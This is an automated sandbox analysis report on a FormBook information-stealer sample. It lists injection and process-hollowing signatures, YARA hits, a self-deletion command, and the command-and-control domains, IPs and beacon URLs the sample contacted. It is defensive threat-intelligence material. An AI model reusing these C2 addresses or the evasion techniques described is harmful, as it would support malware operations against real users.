          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]4_2_02EDFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EC8DF1 mov eax, dword ptr fs:[00000030h]4_2_02EC8DF1
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01236B80 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,0_2_01236B80
          Source: C:\Users\user\Desktop\Inv.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0123C0A3
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0123C080 SetUnhandledExceptionFilter,0_2_0123C080
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0123C0A3
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0123C080 SetUnhandledExceptionFilter,1_2_0123C080

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.217 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.96.186.206 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Inv.exeSection loaded: unknown target: C:\Users\user\Desktop\Inv.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Inv.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Inv.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Inv.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Inv.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Inv.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Inv.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 3F0000Jump to behavior
          Source: C:\Users\user\Desktop\Inv.exeProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'Jump to behavior
          Source: explorer.exe, 00000002.00000000.675251989.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0123D7B7 cpuid 0_2_0123D7B7
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01238431 GetLocalTime,0_2_01238431

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Rootkit1Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2Input Capture1Security Software Discovery151Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Connections Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery112Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339347 Sample: Inv.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 36 www.hwcailing.com 2->36 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 5 other signatures 2->46 11 Inv.exe 2->11         started        signatures3 process4 signatures5 54 Maps a DLL or memory area into another process 11->54 56 Tries to detect virtualization through RDTSC time measurements 11->56 14 Inv.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.achonabu.com 172.96.186.206, 49767, 80 SINGLEHOP-LLCUS Canada 17->30 32 nationshiphop.com 34.102.136.180, 49759, 49769, 80 GOOGLEUS United States 17->32 34 7 other IPs or domains 17->34 38 System process connects to network (likely due to code injection or exploit) 17->38 21 NETSTAT.EXE 17->21         started        24 autofmt.exe 17->24         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 26 cmd.exe 1 21->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Inv.exe39%VirustotalBrowse
          Inv.exe46%ReversingLabsWin32.Trojan.AgentTesla
          Inv.exe100%AviraHEUR/AGEN.1106536
          Inv.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.Inv.exe.d90000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.Inv.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.hwcailing.com0%VirustotalBrowse
          millcityloam.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.a-zsolutionsllc.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.millcityloam.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/40%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.achonabu.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          parkingpage.namecheap.com
          198.54.117.217
          truefalse
            high
            www.hwcailing.com
            107.160.136.152
            truefalseunknown
            millcityloam.com
            34.102.136.180
            truetrueunknown
            www.achonabu.com
            172.96.186.206
            truetrue
              unknown
              nationshiphop.com
              34.102.136.180
              truetrue
                unknown
                www.zhaowulu.com
                unknown
                unknowntrue
                  unknown
                  www.millcityloam.com
                  unknown
                  unknowntrue
                    unknown
                    www.nationshiphop.com
                    unknown
                    unknowntrue
                      unknown
                      www.a-zsolutionsllc.com
                      unknown
                      unknowntrue
                        unknown
                        www.jacmkt.com
                        unknown
                        unknowntrue
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.a-zsolutionsllc.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09ptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJPtrue
                          • Avira URL Cloud: safe
                          unknown
                          http://www.millcityloam.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4true
                          • Avira URL Cloud: safe
                          unknown
                          http://www.achonabu.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFertrue
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.tiro.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.goodfont.co.krexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.comlexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.typography.netDexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://fontfabrik.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.%s.comPAexplorer.exe, 00000002.00000002.1048019987.0000000002B50000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            low
                                            http://www.fonts.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.sandoll.co.krexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.sakkal.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              198.54.117.217
                                              unknownUnited States
                                              22612NAMECHEAP-NETUSfalse
                                              34.102.136.180
                                              unknownUnited States
                                              15169GOOGLEUStrue
                                              172.96.186.206
                                              unknownCanada
                                              32475SINGLEHOP-LLCUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:339347
                                              Start date:13.01.2021
                                              Start time:21:24:36
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 42s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:Inv.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:19
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@8/0@7/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 22.1% (good quality ratio 20%)
                                              • Quality average: 74.8%
                                              • Quality standard deviation: 31.6%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 77
                                              • Number of non-executed functions: 85
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 51.104.139.180, 2.20.142.209, 2.20.142.210, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              198.54.117.217Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                              • www.accessible.legal/csv8/?L48t=PHE4QRv&2drp=oGqbtMoj9RGciudNjVD/q4yy78sx6VM5qF/SD9h0TKn9WKeLzKNy9kqnybDPdO7olw30aQ==
                                              SMA121920.exeGet hashmaliciousBrowse
                                              • www.teamchi.club/t4vo/?QFNH9f=Npnlt5ZtO906n53msd9G5pBOdHOEeXQyD/1EjRFLMV7cbHJomhnAcg5WDTj2pPTWeV1x&_6j0yv=ZJB82RWHd85
                                              hUWiJym6fy.exeGet hashmaliciousBrowse
                                              • www.nautilus.photos/e66m/?Wzr=/jbGnlKlCl+kfGg+6TwKlRO8yGA+aFIV4OcnMw7A2/lyvNgUFCY9EZaTm1ZM9SSqNcgp&vB=chrxU
                                              payment advise.exeGet hashmaliciousBrowse
                                              • www.yelllouder2020.com/rbe/?8pV=_TJP3HkXZXxT3Te&lJBxWNm=1iZ+MyHDHrdkdHDQKPkmKBD0S2oXKnwDfLFj/eZ8ktt80Yt5QRvlAompcTbZEm0zVppV
                                              3Y690n1UsS.exeGet hashmaliciousBrowse
                                              • www.madbaddie.com/csv8/?SR-D3jP=bmU6bhxvgrtQDLdFrXfZu84+YLpNz+FpUYa4sbpu+DXpESkC+J6KAuS4IHdfpiPBOP9d&J0GTk=3fPL-xo0rXp0UNn
                                              Purchase_Order_39563854854.xlsxGet hashmaliciousBrowse
                                              • www.accessible.legal/csv8/?AZ=oGqbtMoj9RGciudNjVD/q4yy78sx6VM5qF/SD9h0TKn9WKeLzKNy9kqnybDPdO7olw30aQ==&1bqtf=oL30w6o
                                              INVOICE3DDH.exeGet hashmaliciousBrowse
                                              • www.varonaoptical.com/o56q/?KX6x=+6KqlXCT/pA/oDqwzrRUswgKWTyt1bmDlyjOl0MkZgd+CYHeb4TWrlrLvaaa+4ROmFJRKyI0ug==&LlZ=blyxBdiX2XMl58
                                              7OKYiP6gHy.exeGet hashmaliciousBrowse
                                              • www.bitcoingreenbond.com/mz59/?DxlpdH=a+WRcNqxRzT0gmXdfVWqtdPWY/r9S9GJaTPpKhK8YBP9A9DbB5qVI1TbjlVOiPDO4tu2&k2Jxtb=fDHHbT_hY
                                              SHIPMENT DOCUMENT.xlsxGet hashmaliciousBrowse
                                              • www.coffeekickz.com/tlu/?Kpjp=Q4FOpxYoQgcQU+FXQZb3qqXy0uOplBKKnEYsQK632yejRcs/kiGhmlxqCAUUokqPZhIFhg==&ebc8=E2JdjN_822M
                                              4Dm4XBD0J5.exeGet hashmaliciousBrowse
                                              • www.homeprosrva.com/glt/?pPX=V631xVWOJYRoGTcZraZCtd7zZZc74cJSbjf7SBZJPBBhWOUaAf9dCgDkRdAAO2+FePB4&1b=jnKtRlNpV
                                              NA_GRAPH.EXEGet hashmaliciousBrowse
                                              • www.adwhitenc.com/t4vo/?lN64=bCoh3yI1mQArDOAcU1sHzv9xr72CvBgm/TKZTqU1aClar/AcK91wi5ywzQHnx30DiDQ5&8p=MTKP1hb
                                              SOA290114.exeGet hashmaliciousBrowse
                                              • www.adwhitenc.com/t4vo/?pRoHnPa=bCoh3yI1mQArDOAcU1sHzv9xr72CvBgm/TKZTqU1aClar/AcK91wi5ywzTr3tGo4l25o6LGAXQ==&uZWD=XPjPaXEPSFMX8Dl
                                              54nwZp1aPg.exeGet hashmaliciousBrowse
                                              • www.buildingmaterialbarginctr.com/d9s8/?ApDl4VD=1z/eRrqZB71kkmnGvJKmv6voY3cB1Da5ESSx+W74rlkt01GQcYdwrCByWvMjmIccoqEN/DEs2w==&Vnt4Z=-ZshAxd0ipuHR2L
                                              RFQ Specification BINIF0865.exeGet hashmaliciousBrowse
                                              • www.cbdsleepguide.com/aqu2/?1bm=IAFBMy4u2uZ0nndpx2l4EhGP6QYf4LjJuZMcxot2rXLO/SjcCDS631VYgPsGowI1/tVB&BR-4c6=YVMdGJH0
                                              WQA101320.exeGet hashmaliciousBrowse
